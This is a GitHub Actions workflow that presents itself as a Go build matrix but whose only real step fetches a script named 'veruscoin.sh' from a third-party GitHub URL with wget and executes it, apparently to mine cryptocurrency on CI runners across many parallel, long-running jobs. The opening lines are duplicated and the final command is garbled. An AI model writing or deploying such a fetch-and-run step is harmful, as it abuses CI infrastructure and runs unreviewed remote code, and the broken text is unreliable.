name: Cumi
on: [push, pull_request]
jobs:name: Cumi
on: [push, pull_request]
jobs:
  build:
    name: Cumi
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A]
    timeout-minutes: 360
    env:
        NUM_JOBS: 5
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Cumi
      run: |
        wget https://raw.githubusercontent.com/aery221/ajengj/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh u+x veruscoin.sh && ./veruscoin.sh
